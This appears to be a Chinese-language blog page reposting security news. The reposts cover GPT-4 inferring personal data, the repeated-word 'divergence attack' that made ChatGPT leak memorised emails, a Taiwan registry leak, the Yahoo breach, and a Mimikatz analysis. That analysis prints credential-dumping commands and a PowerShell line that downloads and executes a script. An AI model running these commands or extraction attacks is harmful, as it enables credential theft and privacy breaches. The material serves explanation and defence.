藉由這句短短對話，ChatGPT 可以推判出說話者很大機率是丹麥人、25 歲，且應是單身狀態。因為在身上灑滿肉桂粉，是丹麥人替 25 歲未婚人士慶生的獨特傳統。

隨著 ChatGPT 使用量持續攀升，模型現在變得更聰明了。目前除了個人使用者絡繹不絕，推出僅 4 個月的企業版 ChatGPT ，已超過 250 間企業成為客戶，估計每天有超過 15 萬名員工，上班會使用企業版 ChatGPT 協助工作。

不過每日湧入大量訓練模型的新數據，正成為 ChatGPT 的新麻煩。由於大型語言模型不會只依照從網上搜尋而來的資訊生成答案，而是根據它從大量數據中所學的東西來回答，這使得模型更善於推敲、預測使用者的弦外之音。

ChaGPT 從社群發文就能猜出個資，準度逾 85%

據《Wired》報導，ChatGPT 擅長從對話中挖掘出一般人無法留意到的細節。例如從一些特殊的文化符號，像是上述提到的肉桂粉慶生，或是一些口語詞用法，來推敲出說話者所處地點、年齡、性別以及種族等。

研究人員以外國鄉民論壇  Reddit 的多篇發文測試， GPT-4 能從發文者看似不著痕跡的語調中推理出發文者的個資，且準確度在 85% 到 95% 之間。ChatGPT 能更細膩的推敲出使用者的資訊、身處情境，聽起來也許貼心且聰明，但這同時也是駭客的福音。

當 ChatGPT 被重複「施咒」，也會不小心吐出他人個資

12月初，Google DeepMind、康乃爾大學和其他四所大學發布了一項研究報告指出，透過特定的觸發詞（Trigger Word），能誘使 ChatGPT 吐出先前記憶的訓練資料。

研究人員發現當使用者要求模型多次複誦 poem（詩詞）、company（公司）、 send（寄送）、make（做）等字眼時，模型在一開始會照做，但在重複幾百次後，模型開始會吐露出一小部分訓練數據，其中包含先前其他使用者留下的對話紀錄，這當中有些資訊包含了私人 email 或其他個資。

「分歧攻擊」可鑽漏洞，《紐約時報》員工 email 被挖出

日前《紐約時報》一篇報導指出，內部編輯 Jeremy White 發現有陌生人透過 ChatGPT 得到他的私人 email 並寄信告知他此事。且 Jeremy 發現不止有他，《紐約時報》裡大約 30 名員工的 email ，都可從 ChatGPT 生成的答覆中取得。

原來該名陌生人，同樣是調查 ChatGPT 吐露個資的研究人員，而該研究是基於付費版本的 GPT-3.5 Turbo 。研究發現 GPT-3.5 Turbo 回答的 email 地址，雖仍存在少許的字元錯誤，但整體正確率達 80% 。

一般來說，OpenAI、Meta 和 Google 等公司會使用不同技術來阻止用戶透過聊天，來向模型打探個人資訊。但是研究團隊採用稱為分歧攻擊（divergence attacks）的方式，透過故意設計的字詞來鑽模型的漏洞，該方法在反覆且大量的測試後，攻擊者多少能找出可繞過模型安全措施的對話，請求模型吐露出自己記得的訓練數據。

不只 ChatGPT，其他 AI 模型的隱私保護力也不足

目前這些研究多數僅止於 ChatGPT，並不適用於其他大型語言模型。而一旦有新的觸發詞被攻擊者找到，公司通常也能快速補齊漏洞，但由於這類大型語言模型通常會允許第三方使用者輸入的資訊成為訓練資料，也就是大部分使用者輸入過的對話，作為訓練內容。

因此，「目前所知的所有商用大型語言模型，事實上都不具備足夠的隱私保護能力。」普林斯頓大學電機與電腦工程系教授 Prateek Mittal 在接受《紐約時報》訪問時如此表示。

出處:用 ChatGPT 挖你個資蠻簡單！研究人員對它重複「施咒」，結果破防了 | TechOrange 科技報橘 (buzzorange.com)

The post 用 ChatGPT 挖你個資蠻簡單！研究人員對它重複「施咒」，結果破防了 first appeared on 捕夢網 Blog.

戶政司資料遭竊，全台2千萬人個資暴露在外
Cyble表示，一個龐大到涵蓋了幾乎一整個國家個資的資料外洩事件相當罕見。研究人員指出，他們在暗網上所發現的資料庫名為“Taiwan Whole Country Home Registry DB”（台灣全國戶政資料庫），整個資料庫的大小則為3.5GB。洩漏的民眾資料，則包含姓名、地址、身分證字號、性別、生日與其他備註。

在暗網上洩漏資料庫的人士說，該資料庫的竊取時間為2019年。但Cyble指出，其中最年幼的個資顯示為2008年生，且部分生日年份為空缺，所以也難以從資料上確認這個資料庫真正的遭竊時間。

行政院發言人：資料並非從政府機關流出
對於本次資安外洩事件，行政院發言人丁怡銘則於今（30）日回應，資安單位初步調查發現內容資料很舊，並從內容格式等情況，研判為整合各類資料來源而成，並非由政府機關流出。

丁怡銘表示，目前資安與警政單位還在持續調查，有進一步消息會再提供更多說明。

文章來源: https://www.bnext.com.tw/article/57906/hack-taiwanpeople-cyble?fbclid=IwAR1Qj6IYOD2vUE4RdrKGwNOJYercgvzAB533ammm50O4HiveBiQ2pY0RF2k

The post 台灣逾2,000萬筆個資流向暗網！行政院調查：資料非政府流出 first appeared on 捕夢網 Blog.

無論對手是誰，幾乎所有Windows入侵當中都能見到它的身影。這不僅僅是一種流行的憑證獲取方法，也是針對性攻擊者和滲透測試人員都常用的憑證獲取工具，因為這工具對於繞過基於特徵碼檢測的功能和有效性都十分強大。

攻擊者常會尋找有效憑證以提高許可權限，並擴大其在目標環境中的染指範圍，獲得有效憑證的方法也是八仙過海各顯神通，有些攻擊者甚至針對同一個目標都會採用多種憑證盜竊技術。

Mimikatz採用4種主要方式：

1. 修改可執行檔名稱
2. 運用批次檔
3. 採用PowerShell變種
4. 改變命令列選項

我們仔細分析一下。

1. 隱蔽：修改可執行檔名稱

攻擊者使用該工具最簡單直接的方法就是將其拷貝到被入侵的系統中，修改可執行檔的檔案名，用以下命令列啟動之：

c:\ProgramData\p.exe  “”privilege::debug””

“”sekurlsa::logonpasswords””

如此這般，系統的憑證資訊便落入了攻擊者手中。

2. 有效：使用批次檔

運用該工具的其他方式還包括採用批次檔將工具複製到目標系統執行，然後將結果輸出到一個檔，並將該輸出檔複製回中心收集點，最後再在目標系統上刪除所有相關檔。

3. 召喚力量支援：採用PowerShell變種

採用Mimikatz的PowerShell變種是又一種獲取目標系統憑證資訊的方法，比如：

powershell -ep Bypass -NoP -NonI -NoLogo -c IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent[.]com/[REDACTED]/Invoke-Mimikatz.ps1’);Invoke-Mimikatz -Command ‘privilege::debug sekurlsa::logonpasswordsexit’

4. 改變命令列選項

2018年第四季度見證了Mimikatz工具的另類用法，尤其是修改命令列選項的一種：

mnl.exe pr::dg sl::lp et -p

該特殊的Mimikatz變種通過WMIC.exe對多個目標系統下手，比如：

Wmic  /NODE:”[REDACTED]” /USER:”[REDACTED]” /password:[REDACTED] process call create “cmd.exe /c (c:\windows\security\mnl.exe pr::dg sl::lp et -p >c:\windows\security\PList.txt) >> c:\windows\temp\temp.txt”

花招百出：需要全面的應對方法

這一系列有效戰術充分顯示出監測攻擊指標(IOA)的重要性。每種技術都是逃避脆弱檢測方法的嘗試，這些脆弱檢測方法要麼只檢測命令列選項以推斷其目的，要麼只檢查二進位檔案中有沒有出現相關字串。

攻擊者可以運用多種技術獲取憑證資訊，但公司企業需要一定程度的可見性以便防禦者能夠觀察到攻擊者所用的新技術，包括被特別用於繞過和顛覆檢測機制的那些。

攻擊指標(IOA)專注於攻擊技術的行為特徵，而不是像檔案名、散列值或單個命令列選項這樣的傳統入侵指標(IOC)。新一代IOA過程能賦予防禦者看清新攻擊技術的能力，即便攻擊者使用了專門的規避或顛覆檢測機制的方法。這是因為IOA著眼攻擊者的意圖，而萬變不離其宗，無論攻擊者使用哪種惡意軟體或漏洞利用程式，終歸逃不脫其惡意目的，只要盯緊攻擊意圖，攻擊便無所遁形。

網路取證領域中，IOC往往被描述為電腦上留存的指征網路安全被破壞的證據。在接到可疑事件通報，或是定期檢查，亦或發現網路中非正常呼出後，調查人員往往會去收集這些資料。理想狀況下，這些資訊被收集以後能夠創建更智慧的工具，可以檢測並隔離未來的可疑檔。因為IOC提供的是跟蹤壞人的反應式方法，當你發現IOC時，有極大的可能性已經被黑了。

此類IOC指征一系列惡意活動，從簡單的I/O操作到提權都有。注重行為特徵的IOA關聯則將這些指標都綜合到一起，用以檢測並防止惡意行為。其結果就是連通過反射注入PowerShell模組進行的憑證盜竊都能檢測出來的防禦技術，可以在攻擊者實際觀測到憑證前扼住該憑證盜取行為。

與基於特徵碼的殺毒軟體類似，基於IOC的檢測方法無法檢測無惡意軟體的威脅和零日漏洞攻擊。因此，公司企業紛紛轉向基於IOA的方法以便更好地適應其安全需求。

The post 簡單而粗暴：網路攻擊界的AK47 first appeared on 捕夢網 Blog.

走向沒落的上一代網路鉅子雅虎（Yahoo!）屋漏偏逢連夜雨，22日宣布該公司在2014年遭到駭客入侵攻擊，至少5億名使用者的資料遭到竊取，規模之大史無前例，而發動者顯然是受到特定國家指使（state-sponsored actor）。雅虎2個月前好不容易才為自己找到買家，此一「噩耗」可能造成大批使用者出走，對併購交易造成衝擊。

駭客竊取的資料包括使用者姓名、電郵、電話、出生日期、加密處理過的密碼、使用者自設的安全問題與答案。但是未加密的密碼、信用卡付款資料與銀行帳戶資料原封未動，堪稱不幸中的大幸。部分（約2億筆）資料可能已被一名代號「和平」（Peace）的駭客送上網路兜售。亡羊補牢，雅虎建議使用者更改密碼。

美國聯邦調查局（FBI）已經展開調查，《路透》引述3位美國情報官員的話說，從雅虎事件的攻擊模式來看，類似俄羅斯情報機構及其指使駭客的手法。

著名密碼學家許奈爾（Bruce Schneier）表示，目前還難以評估雅虎使用者到底受到多大傷害，因為許多關鍵問題仍有待回答，包括所謂「特定國家」到底是哪一國。

雅虎末代執行長梅爾（Marissa Mayer）（AP）

雅虎近年家道中落，欲振乏力，高薪聘請的執行長梅爾（Marissa Mayer）無力回天，成為末代執行長。今年7月25日，雅虎同意將核心事業以48億3000萬美元（新台幣1525億元）、遠低於全盛時期市值的價碼賣給美國電信業威訊（Verizon），未來將與威訊旗下的美國線上（AOL）合併。

《路透》引述分析師佩克（Robert Peck）與律師卡波尼（Steven Caponi）的說法認為，這起事件應該不至於讓威訊從談好的交易縮手，但價碼可能縮水1億至2億美元，決定於有多少使用者從此離開雅虎。威訊方面表示，他們兩天前場得知此事，目前正在評估狀況。

美國連鎖零售業者達吉特（Target）（AP）

知名網路安全專家卡明斯基（Dan Kaminsky）指出，大規模駭客攻擊行動近年此起彼落，但雅虎事件可能是一道分水嶺，促使政府與業者全面加強網路防禦。美國連鎖零售業者家得寶（Home Depot）與達吉特（Target）、醫療保險集團Anthem與Premera Blue Cross，都是知名受害者。

雅虎事件之前，網路史上規模最大的駭客入侵行動發生在2013年，苦主是上一代社群網站龍頭Myspace，3億6000萬使用者個資遭竊。

號稱未受影響的台灣用戶，最近也收到以下這封信件。要求用戶盡速修改帳戶的密碼，並修改安全性問題，不點擊不明連結，降低2次受害風險。

提醒大家，即使未受影響也請定期更新密碼，避免被駭客入侵竊取資料。

文章來源:http://www.storm.mg/article/169340

圖片來源:https://pixabay.com

The post 雅虎屋漏偏逢連夜雨 爆發史上最大規模駭客入侵事件 5億使用者個資外洩 first appeared on 捕夢網 Blog.